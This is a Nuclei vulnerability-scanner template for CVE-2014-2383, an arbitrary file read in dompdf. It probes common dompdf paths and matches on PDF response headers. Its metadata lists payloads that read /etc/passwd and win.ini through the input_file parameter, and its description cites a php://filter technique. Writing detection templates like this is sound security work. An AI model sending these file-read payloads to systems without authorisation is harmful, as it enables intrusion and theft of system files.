nuclei-templates/cves/2014/CVE-2014-2383.yaml

43 lines
1.5 KiB
YAML

id: CVE-2014-2383
info:
name: Arbitrary file read in dompdf < v0.6.0
author: 0x_Akoko
severity: high
description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-2383
- https://www.exploit-db.com/exploits/33004
- http://seclists.org/fulldisclosure/2014/Apr/258
- https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
classification:
cve-id: CVE-2014-2383
metadata:
unix-payload: /dompdf.php?input_file=/etc/passwd
win-payload: /dompdf.php?input_file=C:/windows/win.ini
tags: cve,cve2014,dompdf,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "application/pdf"
- 'filename="dompdf_out.pdf"'
part: header
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24